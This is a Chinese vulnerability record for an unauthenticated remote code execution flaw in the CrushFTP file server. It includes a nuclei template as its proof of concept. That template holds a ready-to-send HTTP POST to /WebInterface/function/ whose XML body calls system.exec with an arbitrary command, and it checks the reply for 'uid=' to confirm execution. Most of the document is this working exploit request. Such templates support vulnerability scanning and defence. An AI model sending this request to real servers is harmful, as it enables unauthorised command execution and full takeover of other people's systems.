漏洞信息
漏洞名称: CrushFTP Unauthenticated RCE
漏洞编号:
漏洞类型: 命令执行
漏洞等级: 严重
漏洞描述: CrushFTP是一款广泛使用的文件传输协议服务器软件,支持多种协议如FTP、SFTP、HTTP等,常用于企业环境中进行文件共享和传输。由于其功能强大和易用性,CrushFTP在多个行业中有广泛的应用。该软件在处理WebInterface功能时存在未授权远程代码执行漏洞,攻击者可以通过构造特定的XML请求,利用system.exec方法执行任意命令。这一漏洞的根源在于服务器未能正确验证和过滤用户输入,导致攻击者可以绕过认证直接执行系统命令。此漏洞的利用无需任何形式的认证,攻击者可以远程利用此漏洞完全控制受影响的服务器,执行任意命令,可能导致数据泄露、服务中断甚至服务器被完全接管。由于漏洞的严重性和易利用性,所有使用受影响版本的CrushFTP服务器的用户应立即采取措施进行防护。
产品厂商: CrushFTP
产品名称: CrushFTP
来源: https://github.com/projectdiscovery/nuclei-templates/blob/7b54aa9f3ff14f936205d339348d70fbbdef6b65/CVE-2025-54309.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47
| id: CVE-2025-54309 info: name: CrushFTP Unauthenticated RCE author: ANshu Bind severity: critical description: | Exploits an unauthenticated remote code execution vulnerability in CrushFTP servers, allowing attackers to execute arbitrary commands or perform malicious actions. reference: - https://www.cvedetails.com/cve/CVE-2025-54309 - https://github.com/advisories/GHSA-rh5q-v9ww-rqgm - https://github.com/issamjr/CVE-2025-54309-EXPLOIT tags: rce,unauthenticated variables: cmd: "id"
http: - raw: - | POST /WebInterface/function/ HTTP/1.1 Host: {{Hostname}} User-Agent: CrushExploit/2.0 Accept: */* Content-Type: application/xml
<?xml version="1.0"?> <methodCall> <methodName>system.exec</methodName> <params> <param> <value> <string>{{cmd}}</string> </value> </param> </params> </methodCall>
matchers-condition: and matchers: - type: word part: body words: - "uid=" - type: status status: - 200
|